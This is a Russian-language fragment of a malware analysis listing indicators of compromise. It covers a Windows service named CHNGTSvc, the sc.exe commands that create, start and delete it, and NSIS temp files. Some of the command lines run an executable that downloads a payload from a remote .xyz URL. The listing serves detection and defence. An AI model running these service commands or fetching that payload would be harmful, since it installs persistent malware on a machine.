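Техническая информация
Ниже перечислены артефакты, которые можно использовать как индикаторы компрометации: параметр реестра службы CHNGTSvc (ImagePath указывает на c:\exervice.exe с URL в качестве аргумента, то есть файл запускается как служба Windows), командные строки запущенных процессов и пути к файлам. Заголовки подразделов в этом фрагменте не сохранились; в части строк URL частично замаскирован символами #.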
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.3d5ba658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe'
- '%TEMP%\nsy2.tmp\ns5.tmp' sc start CHNGTSvc
- '<SYSTEM32>\sc.exe' start CHNGTSvc
- 'C:\exervice.exe' http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe"
- '%TEMP%\nsy2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- '%TEMP%\nsy2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl########.####a658938485652757cfa09eb228c3317acdbc.xyz/download/xpack1010_US.1476106378.exe"
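Пути к файлам (заголовки списков не сохранились; повторяющиеся записи ns4.tmp и ns3.tmp, вероятно, относятся к отдельным спискам созданных и удалённых файлов — требуется проверка по исходному отчёту; nsExec.dll — имя подключаемого модуля установщика NSIS для запуска внешних команд):
- %TEMP%\nsy2.tmp\ns4.tmp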
- %TEMP%\nsy2.tmp\ns5.tmp
- %TEMP%\nsy2.tmp\ns3.tmp
- C:\exervice.exe
- %TEMP%\nsy2.tmp\nsExec.dll
- %TEMP%\nsy2.tmp\ns4.tmp
- %TEMP%\nsy2.tmp\ns3.tmp